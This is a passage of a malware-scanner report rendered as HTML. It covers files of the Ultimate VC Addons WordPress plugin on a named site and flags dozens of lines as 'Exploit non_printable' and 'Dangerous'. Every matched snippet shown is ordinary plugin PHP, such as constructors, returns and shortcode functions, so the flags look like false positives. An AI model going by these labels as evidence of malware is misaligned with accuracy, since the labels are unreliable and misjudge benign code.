<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Image_Separator'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Image_Separator </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Image_Separator</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_easy_separator_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 163</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_img_separator_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_img_separator_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_300").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_just_icon.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_301" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'AIO_Just_Icon'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$AIO_Just_Icon </span><span style="color: #007700">= new </span><span style="color: #0000BB">AIO_Just_Icon</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_just_icon' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_just_icon </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">just_icon_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">just_icon_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function () {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 447</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_301").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_tab.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.93 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 30</span><br><table id="file_302" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">containerHtmlBlockParams</span><span style="color: #007700">( </span><span style="color: #0000BB">$width</span><span style="color: #007700">, </span><span style="color: #0000BB">$i </span><span style="color: #007700">) { return </span><span style="color: #DD0000">'class="wpb_column_container vc_container_for_children"'</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">getColumnControls</span><span style="color: #007700">( </span><span style="color: #0000BB">$controls</span><span style="color: #007700">, </span><span style="color: #0000BB">$extended_css </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">getColumnControlsModular</span><span style="color: #007700">(</span><span style="color: #0000BB">$extended_css</span><span style="color: #007700">); } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1281</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1355</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_tabs</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_tabs_admin</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1369</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">contentAdmin</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1481</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTabTemplate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="wpb_template">' </span><span style="color: #007700">. </span><span style="color: #0000BB">do_shortcode</span><span style="color: #007700">( </span><span style="color: #DD0000">'[single_tab title="Tab" tab_id="" icon_type="" icon="" icon_color="" icon_hover_color="" icon_size="15px" icon_background_color=""][/single_tab]' </span><span style="color: #007700">) . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setCustomTabId</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">( </span><span style="color: #DD0000">'/tab\_id\=\"([^\"]+)\"/'</span><span style="color: #007700">, </span><span style="color: #DD0000">'tab_id="$1-' </span><span style="color: #007700">. </span><span style="color: #0000BB">time</span><span style="color: #007700">() . </span><span style="color: #DD0000">'"'</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_path_dir'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">customAdminBlockParams</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">' id="tab-' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">atts</span><span style="color: #007700">[</span><span style="color: #DD0000">'tab_id'</span><span style="color: #007700">]) . </span><span style="color: #DD0000">'"'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mainHtmlBlockParams</span><span style="color: #007700">( </span><span style="color: #0000BB">$width</span><span style="color: #007700">, </span><span style="color: #0000BB">$i </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'data-element_type="' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">settings</span><span style="color: #007700">[</span><span style="color: #DD0000">"base"</span><span style="color: #007700">]) . </span><span style="color: #DD0000">'" class="wpb_' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'base'</span><span style="color: #007700">]) . </span><span style="color: #DD0000">' wpb_sortable wpb_content_holder"' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">customAdminBlockParams</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1534</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">containerHtmlBlockParams</span><span style="color: #007700">( </span><span style="color: #0000BB">$width</span><span style="color: #007700">, </span><span style="color: #0000BB">$i </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1535</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'class="wpb_column_container vc_container_for_children"'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1537</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getColumnControls</span><span style="color: #007700">( </span><span style="color: #0000BB">$controls</span><span style="color: #007700">, </span><span style="color: #0000BB">$extended_css </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1539</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">getColumnControlsModular</span><span style="color: #007700">(</span><span style="color: #0000BB">$extended_css</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 206</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_single_tab</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts </span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$op</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 667</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$actab</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 669</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_tab_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_main_tab</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts </span><span style="color: #007700">,</span><span style="color: #0000BB">$content</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_302").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_modals.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 57.91 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_303" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">ultimate_modal_init</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Modal Box"</span><span style="color: #007700">, </span><span style="color: #DD0000">"ultimate_vc"</span><span style="color: #007700">), </span><span style="color: #DD0000">"base" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ultimate_modal"</span><span style="color: #007700">, </span><span style="color: #DD0000">"icon" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"vc_modal_box"</span><span style="color: #007700">, </span><span style="color: #DD0000">"class" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"modal_box"</span><span style="color: #007700">, </span><span style="color: #DD0000">"category" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"Ultimate VC Addons"</span><span style="color: #007700">, </span><span style="color: #DD0000">"descriptio</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
